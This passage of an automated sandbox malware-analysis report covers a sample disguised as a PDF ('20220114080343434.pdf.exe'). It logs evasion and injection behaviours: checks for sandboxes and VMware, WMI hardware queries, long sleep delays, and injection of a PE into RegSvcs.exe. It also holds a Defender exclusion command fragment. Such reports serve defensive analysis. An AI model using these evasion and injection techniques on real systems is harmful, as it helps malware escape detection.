                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.2daf808.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.2db7814.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exe TID: 4060Thread sleep time: -40740s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exe TID: 5832Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2444Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7407Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 40740Jump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017FC148 LdrInitializeThunk,8_2_017FC148
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000Jump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000Jump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1152008Jump to behavior
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Users\user\Desktop\20220114080343434.pdf.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
